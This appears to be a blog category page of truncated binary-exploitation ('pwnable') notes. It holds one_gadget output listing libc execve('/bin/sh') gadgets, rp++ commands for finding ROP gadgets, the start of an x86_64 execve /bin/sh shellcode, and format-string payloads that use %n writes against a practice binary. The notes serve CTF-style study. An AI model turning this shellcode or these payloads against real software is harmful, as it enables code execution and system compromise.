HACK
-
One Gadget Installation and Usage
HACK/PWNABLE 2019. 4. 22. 23:57
> apt install ruby
> gem install one_gadget
> one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
-
ROPGadget Search 2 with rp++
HACK/PWNABLE 2019. 4. 21. 21:21
wget https://github.com/0vercl0k/rp/releases/download/v1/rp-lin-x64; mv rp-lin-x64 rp64
wget https://github.com/0vercl0k/rp/releases/download/v1/rp-lin-x86; mv rp-lin-x86 rp86
# downloaded files are not executable by default
chmod +x rp64 rp86
export PATH=$PATH:$PWD
rp64 -f /lib/x86_64-linux-gnu/libc.so.6 -r 4 | grep 'pop rdi ; ret'
-
x64/execve Shellcode (24 bytes)
HACK/PWNABLE 2019. 4. 10. 11:28
/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 14/06/2017
;Architecture: Linux x86_64
;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux

##########
# Source #
##########

section .text
  global _start
    _start:
      push rax
      xor rdx, rdx
      xor rsi, rsi
      mov rbx,'/bin//sh'
      push rbx
      push rsp
      pop rdi
      mov al, 59
      sys..
-
FSB TIPS
HACK/PWNABLE 2019. 3. 24. 22:26
[0xbffffa98] -> [0xdeadbeef]

[input]
./fsb "`python -c 'print "AAAA" + " %08x"*9'`"
[output]
check at 0xbffffa98
argv[1] = [AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x]
fmt=[AAAA b7fdc4a0 00000001 00000000 00000001 bffffbd4 00000000 00000000 04030201 41414141]
check=0x4030201

[payload 1]
./fsb `python -c 'print "\x98\xfa\xff\xbf"+"AAAA"+"\x9a\xfa\xff\xbf"+"%08x"*7+"%48811c%n%8126c%n"'`
[payload 2]..